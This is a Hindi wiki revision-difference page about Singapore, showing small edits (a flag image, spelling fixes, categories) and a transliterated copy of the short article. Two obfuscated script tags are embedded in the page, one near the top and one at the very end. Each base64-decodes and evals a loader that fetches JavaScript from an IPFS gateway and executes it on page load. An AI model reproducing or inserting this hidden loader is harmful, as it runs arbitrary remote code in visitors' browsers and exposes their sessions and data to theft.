Difference between revisions of "सिंगापुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
*सिंगापुर एक देश है और सिंगापुर दक्षिण एशिया में मलेशिया और इंडोनेशिया के बीच में स्थित है।
+
[[चित्र:Singapore-Flag.jpg|thumb|सिंगापुर का ध्वज]]
 +
'''सिंगापुर''' एक देश है और सिंगापुर दक्षिण एशिया में मलेशिया और इंडोनेशिया के बीच में स्थित है।
 
*38 लाख की कुल आबादी वाले व्यावसायिक केंद्र के रूप में जाने जाने वाले सिंगापुर में मुख्य रूप से [[चीन]], मलयेशिया और [[भारत]] के लोग आकर बसे हैं।  
 
*38 लाख की कुल आबादी वाले व्यावसायिक केंद्र के रूप में जाने जाने वाले सिंगापुर में मुख्य रूप से [[चीन]], मलयेशिया और [[भारत]] के लोग आकर बसे हैं।  
 
*हालांकि सिंगापुर की आधिकारिक भाषा मलय है, पर [[अंग्रेजी]] आमतौर पर समझी और बोली जाती है।  
 
*हालांकि सिंगापुर की आधिकारिक भाषा मलय है, पर [[अंग्रेजी]] आमतौर पर समझी और बोली जाती है।  
*54 छोटे-छोटे द्वीपों से मिलकर बने इस देश ने अपनी छोटी-सी भौगोलिक स्थिति में ही इतनी चीजों को समेटा सहेजा और जुटाया है कि आपको समग्र रूप में सिंगापुर देखने के लिए कई दिन बिताने पड़ेंगे। *सिंगापुर की एक खासियत यह है कि आप पूरे साल सिंगापुर कभी भी आ सकते हैं। मौसम इसमें कहीं बाधा नहीं है।   
+
*54 छोटे-छोटे द्वीपों से मिलकर बने इस देश ने अपनी छोटी-सी भौगोलिक स्थिति में ही इतनी चीज़ों को समेटा सहेजा और जुटाया है कि आपको समग्र रूप में सिंगापुर देखने के लिए कई दिन बिताने पड़ेंगे। *सिंगापुर की एक ख़ासियत यह है कि आप पूरे साल सिंगापुर कभी भी आ सकते हैं। मौसम इसमें कहीं बाधा नहीं है।   
  
{{प्रचार}}
 
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 13: Line 13:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
{{विदेशी स्थान}}
+
{{देश}}
 
[[Category:विदेशी स्थान]]
 
[[Category:विदेशी स्थान]]
 +
[[Category:विदेश]]
 +
[[Category:देश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:46, 18 February 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|siangapur ka dhvaj siangapur ek desh hai aur siangapur dakshin eshiya mean maleshiya aur iandoneshiya ke bich mean sthit hai.

  • 38 lakh ki kul abadi vale vyavasayik keandr ke roop mean jane jane vale siangapur mean mukhy roop se chin, malayeshiya aur bharat ke log akar base haian.
  • halaanki siangapur ki adhikarik bhasha malay hai, par aangreji amataur par samajhi aur boli jati hai.
  • 54 chhote-chhote dvipoan se milakar bane is desh ne apani chhoti-si bhaugolik sthiti mean hi itani chizoan ko sameta saheja aur jutaya hai ki apako samagr roop mean siangapur dekhane ke lie kee din bitane p deange. *siangapur ki ek khasiyat yah hai ki ap poore sal siangapur kabhi bhi a sakate haian. mausam isamean kahian badha nahian hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>